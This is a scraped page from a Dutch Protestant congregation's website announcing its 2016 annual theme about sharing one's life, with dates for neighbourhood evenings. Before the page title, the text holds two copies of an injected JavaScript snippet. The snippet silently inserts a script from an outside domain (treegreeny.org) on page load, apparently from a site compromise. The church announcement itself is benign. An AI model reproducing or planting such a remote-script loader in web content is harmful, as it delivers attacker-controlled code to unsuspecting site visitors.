;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Deel je leven …ons (PKN-) jaarthema ! - PKN Damwâld

Deel je leven …ons (PKN-) jaarthema !

Gepubliceerd op: maandag 12 september 2016

 Deel je leven …ons jaarthema !

Eigenlijk is het iets wat je dagelijks en misschien wel automatisch doet. Je deelt je leven met je familie, je collega’s, je vrienden en noem maar op. Je deelt het met mensen die je hebt uitgezocht, maar ook met een heleboel anderen die “zomaar” in je leven zijn. Je deelt je leven op alledaagse momenten en in tijden van vreugde en droefheid. Dat delen doe je ook in de kerk, met je geloofsgenoten. Je deelt er je vragen over geloof en leven, over verdriet en vreugde, twijfel en hoop. En waarschijnlijk deel je dat stukje kerk in je leven ook met mensen buiten de kerk, met mensen die op je pad komen, met mensen die zien dat je naar de kerk gaat en vragen: Hé, wat zoek je daar? Niet alleen op startzondag 18 september gaan we daar mee aan de slag maar ook bijvoorbeeld tijdens onze wijkavonden!  We willen proberen iets met dat delen te doen en ook na de dienst. En soms zal dat best weleens moeilijk zijn. Want delen betekent eigenlijk dat je iets van jezelf weggeeft: de ruimte om je heen, de vertrouwde mensen naast je en dat je je bijvoorbeeld naar een ander durft te bewegen. Delen is ook dat je weggeeft van waar je goed in bent (kan niet schelen wat !), maar ook dat je iets durft te vragen van wat je zelf mist of nodig hebt. Delen is immers geven én ontvangen!

Een overzicht van de wijkavonden:  donderdag 17 november  (de laatste in deze serie) voor de wijken 1 en 5. In Nij Tjaerda wordt zoals gebruikelijk een speciale wijkmiddag (datum nog niet bekend) georganiseerd. Meer info in de komende Paadwizer ! Komt uw avond niet gelegen, schroom dan niet om voor een andere avond te kiezen en of u alvast in te schrijven voor de wijkmiddag in Nij Tjaerda. 

Doe mee en deel mee !